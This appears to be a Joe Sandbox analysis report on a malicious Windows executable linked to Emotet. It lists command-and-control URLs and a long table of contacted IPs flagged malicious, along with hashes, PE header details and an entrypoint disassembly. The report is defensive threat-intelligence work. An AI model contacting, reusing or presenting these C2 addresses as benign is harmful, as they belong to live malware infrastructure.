              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/Omibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/4mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://121.124.124.40:7080/gLDpms1fYdKy/Wmibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/4mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://121.124.124.40:7080/gLDpms1fYdKy/biP8R7/XHAjzKH0LnedA/4mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://121.124.124.40:7080/gLDpms1fYdKy/E0jZmibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/wsock.dll.muimibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/?mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/bmibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/3mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/4mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/pmibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              194.4.58.192
              		unknownKazakhstan
              		202958HOSTER-KZtrue
              102.182.93.220
              		unknownSouth Africa
              		37611AfrihostZAtrue
              95.9.5.93
              		unknownTurkey
              		9121TTNETTRtrue
              94.200.114.161
              		unknownUnited Arab Emirates
              		15802DU-AS1AEtrue
              72.186.136.247
              		unknownUnited States
              		33363BHN-33363UStrue
              115.94.207.99
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRtrue
              89.121.205.18
              		unknownRomania
              		9050RTDBucharestRomaniaROtrue
              24.133.106.23
              		unknownTurkey
              		47524TURKSAT-ASTRtrue
              200.116.145.225
              		unknownColombia
              		13489EPMTelecomunicacionesSAESPCOtrue
              216.139.123.119
              		unknownUnited States
              		395582GRM-NETWORKUStrue
              172.105.13.66
              		unknownUnited States
              		63949LINODE-APLinodeLLCUStrue
              138.68.87.218
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              220.245.198.194
              		unknownAustralia
              		7545TPG-INTERNET-APTPGTelecomLimitedAUtrue
              67.170.250.203
              		unknownUnited States
              		7922COMCAST-7922UStrue
              104.131.11.150
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              176.111.60.55
              		unknownUkraine
              		24703UN-UKRAINE-ASKievUkraineUAtrue
              24.178.90.49
              		unknownUnited States
              		20115CHARTER-20115UStrue
              94.23.237.171
              		unknownFrance
              		16276OVHFRtrue
              187.161.206.24
              		unknownMexico
              		11888TelevisionInternacionalSAdeCVMXtrue
              41.185.28.84
              		unknownSouth Africa
              		36943GridhostZAtrue
              194.190.67.75
              		unknownRussian Federation
              		50804BESTLINE-NET-PROTVINORUtrue
              186.74.215.34
              		unknownPanama
              		11556CableWirelessPanamaPAtrue
              202.134.4.216
              		unknownIndonesia
              		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
              120.150.218.241
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUtrue
              202.134.4.211
              		unknownIndonesia
              		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
              87.106.139.101
              		unknownGermany
              		8560ONEANDONE-ASBrauerstrasse48DEtrue
              62.30.7.67
              		unknownUnited Kingdom
              		5089NTLGBtrue
              123.142.37.166
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRtrue
              75.143.247.51
              		unknownUnited States
              		20115CHARTER-20115UStrue
              49.3.224.99
              		unknownAustralia
              		4804MPX-ASMicroplexPTYLTDAUtrue
              87.106.136.232
              		unknownGermany
              		8560ONEANDONE-ASBrauerstrasse48DEtrue
              62.75.141.82
              		unknownGermany
              		8972GD-EMEA-DC-SXB1DEtrue
              162.241.140.129
              		unknownUnited States
              		46606UNIFIEDLAYER-AS-1UStrue
              119.59.116.21
              		unknownThailand
              		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
              172.91.208.86
              		unknownUnited States
              		20001TWC-20001-PACWESTUStrue
              113.61.66.94
              		unknownAustralia
              		45510TELCOINABOX-AULevel109HunterStreetAUtrue
              96.245.227.43
              		unknownUnited States
              		701UUNETUStrue
              37.139.21.175
              		unknownNetherlands
              		14061DIGITALOCEAN-ASNUStrue
              194.187.133.160
              		unknownBulgaria
              		13124IBGCBGtrue
              121.7.31.214
              		unknownSingapore
              		9506SINGTEL-FIBRESingtelFibreBroadbandSGtrue
              112.185.64.233
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRtrue
              61.76.222.210
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRtrue
              95.213.236.64
              		unknownRussian Federation
              		49505SELECTELRUtrue
              46.105.131.79
              		unknownFrance
              		16276OVHFRtrue
              27.114.9.93
              		unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
              74.214.230.200
              		unknownUnited States
              		36728EMERYTELCOMUStrue
              190.162.215.233
              		unknownChile
              		22047VTRBANDAANCHASACLtrue
              110.145.77.103
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUtrue
              154.91.33.137
              		unknownSeychelles
              		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
              120.150.60.189
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUtrue
              107.170.146.252
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              93.147.212.206
              		unknownItaly
              		30722VODAFONE-IT-ASNITtrue
              91.211.88.52
              		unknownUkraine
              		206638HOSTFORYUAtrue
              172.86.188.251
              		unknownCanada
              		32489AMANAHA-NEWCAtrue
              50.35.17.13
              		unknownUnited States
              		27017ZIPLY-FIBER-LEGACY-ASNUStrue
              157.245.99.39
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              167.114.153.111
              		unknownCanada
              		16276OVHFRtrue
              37.179.204.33
              		unknownItaly
              		30722VODAFONE-IT-ASNITtrue
              203.153.216.189
              		unknownIndonesia
              		45291SURF-IDPTSurfindoNetworkIDtrue
              2.58.16.89
              		unknownLatvia
              		64421SERTEX-ASLVtrue
              59.125.219.109
              		unknownTaiwan; Republic of China (ROC)
              		3462HINETDataCommunicationBusinessGroupTWtrue
              62.171.142.179
              		unknownUnited Kingdom
              		51167CONTABODEtrue
              123.176.25.234
              		unknownMaldives
              		7642DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMVtrue
              50.91.114.38
              		unknownUnited States
              		33363BHN-33363UStrue
              61.33.119.226
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRtrue
              78.24.219.147
              		unknownRussian Federation
              		29182THEFIRST-ASRUtrue
              217.123.207.149
              		unknownNetherlands
              		33915TNF-ASNLtrue
              24.179.13.119
              		unknownUnited States
              		20115CHARTER-20115UStrue
              173.63.222.65
              		unknownUnited States
              		701UUNETUStrue
              173.212.214.235
              		unknownGermany
              		51167CONTABODEtrue
              47.36.140.164
              		unknownUnited States
              		20115CHARTER-20115UStrue
              110.142.236.207
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUtrue
              139.99.158.11
              		unknownCanada
              		16276OVHFRtrue
              49.50.209.131
              		unknownNew Zealand
              		55853MEGATEL-AS-APMegatelNZtrue
              190.108.228.27
              		unknownArgentina
              		27751NeunetSAARtrue
              202.141.243.254
              		unknownPakistan
              		9260MULTINET-AS-APMultinetPakistanPvtLtdPKtrue
              121.124.124.40
              		unknownKorea Republic of
              		9318SKB-ASSKBroadbandCoLtdKRtrue
              139.59.60.244
              		unknownSingapore
              		14061DIGITALOCEAN-ASNUStrue
              61.19.246.238
              		unknownThailand
              		9335CAT-CLOUD-APCATTelecomPublicCompanyLimitedTHtrue
              168.235.67.138
              		unknownUnited States
              		3842RAMNODEUStrue
              137.59.187.107
              		unknownHong Kong
              		18106VIEWQWEST-SG-APViewqwestPteLtdSGtrue
              78.188.106.53
              		unknownTurkey
              		9121TTNETTRtrue
              71.15.245.148
              		unknownUnited States
              		20115CHARTER-20115UStrue
              188.219.31.12
              		unknownItaly
              		30722VODAFONE-IT-ASNITtrue
              217.20.166.178
              		unknownUkraine
              		1820WNETUStrue
              24.230.141.169
              		unknownUnited States
              		11232MIDCO-NETUStrue
              74.208.45.104
              		unknownUnited States
              		8560ONEANDONE-ASBrauerstrasse48DEtrue
              134.209.144.106
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              186.70.56.94
              		unknownEcuador
              		14522SatnetECtrue
              97.82.79.83
              		unknownUnited States
              		20115CHARTER-20115UStrue
              172.104.97.173
              		unknownUnited States
              		63949LINODE-APLinodeLLCUStrue
              139.162.60.124
              		unknownNetherlands
              		63949LINODE-APLinodeLLCUStrue
              190.12.119.180
              		unknownArgentina
              		11014CPSARtrue
              184.180.181.202
              		unknownUnited States
              		22773ASN-CXA-ALL-CCI-22773-RDCUStrue
              176.113.52.6
              		unknownRussian Federation
              		8712INTA-ASRUtrue
              201.241.127.190
              		unknownChile
              		22047VTRBANDAANCHASACLtrue
              68.115.186.26
              		unknownUnited States
              		20115CHARTER-20115UStrue
              91.146.156.228
              		unknownHungary
              		8462TARR1HUtrue
              24.137.76.62
              		unknownCanada
              		11260EASTLINK-HSICAtrue
              182.208.30.18
              		unknownKorea Republic of
              		17858POWERVIS-AS-KRLGPOWERCOMMKRtrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1496042
              Start date and time:2024-08-20 19:09:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 55s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:ExeFile (233).exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/0@0/100
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 75
              • Number of non-executed functions: 307
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: ExeFile (233).exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              13:09:55API Interceptor1x Sleep call for process: ExeFile (233).exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              194.4.58.192ExeFile (22).exeGet hashmaliciousEmotetBrowse
                0TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                  0TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                    boI88C399w.exeGet hashmaliciousEmotetBrowse
                      boI88C399w.exeGet hashmaliciousEmotetBrowse
                        v8iFmF7XPp.dllGet hashmaliciousEmotetBrowse
                          2ojdmC51As.exeGet hashmaliciousEmotetBrowse
                            IU-8549 Medical report COVID-19.docGet hashmaliciousEmotetBrowse
                              102.182.93.2200TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                                0TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                                  boI88C399w.exeGet hashmaliciousEmotetBrowse
                                    boI88C399w.exeGet hashmaliciousEmotetBrowse
                                      2ojdmC51As.exeGet hashmaliciousEmotetBrowse
                                        95.9.5.930TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                                          0TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                                            boI88C399w.exeGet hashmaliciousEmotetBrowse
                                              boI88C399w.exeGet hashmaliciousEmotetBrowse
                                                v8iFmF7XPp.dllGet hashmaliciousEmotetBrowse
                                                  2ojdmC51As.exeGet hashmaliciousEmotetBrowse
                                                    IU-8549 Medical report COVID-19.docGet hashmaliciousEmotetBrowse
                                                      94.200.114.161ExeFile (226).exeGet hashmaliciousEmotetBrowse
                                                      • 94.200.114.161/KN2k/QHavZNk7lTSx8eJLpbP/0vd7gjsQ5TsEb0Rcx/
                                                      ExeFile (106).exeGet hashmaliciousEmotetBrowse
                                                      • 94.200.114.161/cHAjU/OuEQIhBlus38A7g/
                                                      72.186.136.2470TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                                                        0TOEtGJHN8.exeGet hashmaliciousEmotetBrowse
                                                          boI88C399w.exeGet hashmaliciousEmotetBrowse
                                                            boI88C399w.exeGet hashmaliciousEmotetBrowse
                                                              v8iFmF7XPp.dllGet hashmaliciousEmotetBrowse

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                HOSTER-KZExeFile (22).exeGet hashmaliciousEmotetBrowse
                                                                • 194.4.58.192
                                                                https://murat-turkiye.com/Get hashmaliciousUnknownBrowse
                                                                • 185.116.195.173
                                                                Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.98.5.168
                                                                ndplanernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.98.5.168
                                                                Bespot.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.98.5.168
                                                                http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                • 185.98.5.134
                                                                http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                • 194.146.41.103
                                                                https://documentautomation.wolterskluwer.com/smartdocuments/wizard/Redirect.jsp?url=https://marhenzproperties.com//zlnn/zql/qwad/bmV0d29ya0BoeXVuZGFpbW92ZXguY29tGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                • 185.116.195.173
                                                                QGK1Or5rcl.elfGet hashmaliciousMiraiBrowse
                                                                • 185.113.132.24
                                                                8F8B341230323B995C1CDE1D534031092BFDDB56411DA.exeGet hashmaliciousNitol, SmokeLoader, VidarBrowse
                                                                • 185.116.193.219
                                                                TTNETTRKKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                                                                • 78.173.190.108
                                                                KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 88.247.26.26
                                                                ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                                                • 81.215.230.173
                                                                ExeFile (317).exeGet hashmaliciousEmotetBrowse
                                                                • 78.187.156.31
                                                                ExeFile (323).exeGet hashmaliciousEmotetBrowse
                                                                • 212.174.55.22
                                                                ExeFile (333).exeGet hashmaliciousEmotetBrowse
                                                                • 88.247.58.26
                                                                ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                                                • 95.9.180.128
                                                                ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                                                • 95.9.180.128
                                                                ExeFile (360).exeGet hashmaliciousEmotetBrowse
                                                                • 78.187.156.31
                                                                ExeFile (356).exeGet hashmaliciousEmotetBrowse
                                                                • 78.187.156.31
                                                                AfrihostZAKKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                                                                • 169.224.4.87
                                                                KKveTTgaAAsecNNaaaa.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 169.123.172.83
                                                                KKveTTgaAAsecNNaaaa.m68k.elfGet hashmaliciousUnknownBrowse
                                                                • 169.75.195.70
                                                                KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                • 169.110.114.207
                                                                ExeFile (267).exeGet hashmaliciousEmotetBrowse
                                                                • 41.76.213.144
                                                                ExeFile (317).exeGet hashmaliciousEmotetBrowse
                                                                • 156.155.166.221
                                                                ExeFile (360).exeGet hashmaliciousEmotetBrowse
                                                                • 156.155.166.221
                                                                ExeFile (356).exeGet hashmaliciousEmotetBrowse
                                                                • 156.155.166.221
                                                                ExeFile (64).exeGet hashmaliciousEmotetBrowse
                                                                • 169.1.211.133
                                                                ExeFile (285).exeGet hashmaliciousEmotetBrowse
                                                                • 169.1.211.133

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                No created / dropped files found

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.146148194581717
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:ExeFile (233).exe
                                                                File size:471'040 bytes
                                                                MD5:59287b19f7d85e749d19a57337103045
                                                                SHA1:9de93499becd7a7501db4895d934d8792e7c91c8
                                                                SHA256:c19a014a1cdf25ec6441d305376dfe78b5c20ada7494fbc4aa2d6f68631df3d9
                                                                SHA512:655d2a9259a6d075320f18d46c5ba294504b9385a4b8533f79288c40a0b022cd7d6d35201336dfc0bbb5c0cf957e709b94feb1ee1402d1bff3668bd8163b7192
                                                                SSDEEP:12288:UOps+brP/VgjVbKTrOhkfq8eKYmC3LC2:bs+vPN0b1ywLC2
                                                                TLSH:05A4D01272F1C872C5A321724DE6976A72B6FC204F36828773943B1DEE717D19A36392
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.7...YK..YK..YK...K..YK..@K..YK...K..YK...K..YK..XKJ.YK..VK..YK...K..YK(.~K..YK..9K..YK...K..YK...K..YKRich..YK...............

                                                                File Icon

                                                                Icon Hash:71b018dccec77331

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x40e812
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:
                                                                Time Stamp:0x5F989F4A [Tue Oct 27 22:29:30 2020 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:a1ffb2dee3f2bd7fa6ea833c618895d8

                                                                Entrypoint Preview

                                                                Instruction
                                                                push 00000060h
                                                                push 00431A70h
                                                                call 00007F6094BA4A17h
                                                                mov edi, 00000094h
                                                                mov eax, edi
                                                                call 00007F6094BA3C6Bh
                                                                mov dword ptr [ebp-18h], esp
                                                                mov esi, esp
                                                                mov dword ptr [esi], edi
                                                                push esi
                                                                call dword ptr [0042E290h]
                                                                mov ecx, dword ptr [esi+10h]
                                                                mov dword ptr [0043F4B8h], ecx
                                                                mov eax, dword ptr [esi+04h]
                                                                mov dword ptr [0043F4C4h], eax
                                                                mov edx, dword ptr [esi+08h]
                                                                mov dword ptr [0043F4C8h], edx
                                                                mov esi, dword ptr [esi+0Ch]
                                                                and esi, 00007FFFh
                                                                mov dword ptr [0043F4BCh], esi
                                                                cmp ecx, 02h
                                                                je 00007F6094BA3D2Eh
                                                                or esi, 00008000h
                                                                mov dword ptr [0043F4BCh], esi
                                                                shl eax, 08h
                                                                add eax, edx
                                                                mov dword ptr [0043F4C0h], eax
                                                                xor esi, esi
                                                                push esi
                                                                mov edi, dword ptr [0042E248h]
                                                                call edi
                                                                cmp word ptr [eax], 5A4Dh
                                                                jne 00007F6094BA3D41h
                                                                mov ecx, dword ptr [eax+3Ch]
                                                                add ecx, eax
                                                                cmp dword ptr [ecx], 00004550h
                                                                jne 00007F6094BA3D34h
                                                                movzx eax, word ptr [ecx+18h]
                                                                cmp eax, 0000010Bh
                                                                je 00007F6094BA3D41h
                                                                cmp eax, 0000020Bh
                                                                je 00007F6094BA3D27h
                                                                mov dword ptr [ebp-1Ch], esi
                                                                jmp 00007F6094BA3D49h
                                                                cmp dword ptr [ecx+00000084h], 0Eh
                                                                jbe 00007F6094BA3D14h
                                                                xor eax, eax
                                                                cmp dword ptr [ecx+000000F8h], esi
                                                                jmp 00007F6094BA3D30h
                                                                cmp dword ptr [ecx+74h], 0Eh
                                                                jbe 00007F6094BA3D04h
                                                                xor eax, eax
                                                                cmp dword ptr [ecx+000000E8h], esi
                                                                setne al
                                                                mov dword ptr [ebp-1Ch], eax

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ASM] VS2003 (.NET) build 3077
                                                                • [ C ] VS2003 (.NET) build 3077
                                                                • [C++] VS2003 (.NET) build 3077
                                                                • [RES] VS2003 (.NET) build 3077
                                                                • [LNK] VS2003 (.NET) build 3077

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x38c440x104.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x410000x340b0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x346480x48.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2e0000x5ac.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x38bbc0x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x2c8060x2d000a1f46075ae8d1c2a59b224793a39fa17False0.5946017795138889data6.574938035016087IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x2e0000xc8e60xd000209b1f7310f5f0a23d5f79cfff96500bFalse0.33680138221153844data4.9172308771954265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x3b0000x5f740x30008b09d8979c02b69cae22ad732358f6faFalse0.2674153645833333data3.850805729333682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x410000x340b00x350004472d4467d39a717951d9704e350b809False0.9107136276533019data7.709158800124314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_CURSOR0x721c80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                RT_CURSOR0x723000xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                RT_CURSOR0x723e00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                RT_CURSOR0x725300x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                RT_CURSOR0x726800x134dataEnglishUnited States0.37337662337662336
                                                                RT_CURSOR0x727d00x134dataEnglishUnited States0.37662337662337664
                                                                RT_CURSOR0x729200x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                RT_CURSOR0x72a700x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                RT_CURSOR0x72bc00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                RT_CURSOR0x72d100x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                RT_CURSOR0x72e600x134dataEnglishUnited States0.44155844155844154
                                                                RT_CURSOR0x72fb00x134dataEnglishUnited States0.4155844155844156
                                                                RT_CURSOR0x731000x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                RT_CURSOR0x732500x134dataEnglishUnited States0.2662337662337662
                                                                RT_CURSOR0x733a00x134dataEnglishUnited States0.2824675324675325
                                                                RT_CURSOR0x734f00x134dataEnglishUnited States0.3246753246753247
                                                                RT_BITMAP0x737280xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                RT_BITMAP0x737e00x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                RT_ICON0x41b400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.33064516129032256
                                                                RT_ICON0x41e280x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.4391891891891892
                                                                RT_DIALOG0x71ab00x102dataEnglishUnited States0.6550387596899225
                                                                RT_DIALOG0x71bb80x328dataEnglishUnited States0.4504950495049505
                                                                RT_DIALOG0x736400xe8dataEnglishUnited States0.6336206896551724
                                                                RT_STRING0x739280x88dataEnglishUnited States0.6691176470588235
                                                                RT_STRING0x739b00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                RT_STRING0x73a380x2adataEnglishUnited States0.5476190476190477
                                                                RT_STRING0x73a680x192dataEnglishUnited States0.48009950248756217
                                                                RT_STRING0x73c000x4e2dataEnglishUnited States0.376
                                                                RT_STRING0x744780x31adataEnglishUnited States0.2682619647355164
                                                                RT_STRING0x741980x2dcdataEnglishUnited States0.36885245901639346
                                                                RT_STRING0x74fd80x8adataEnglishUnited States0.6594202898550725
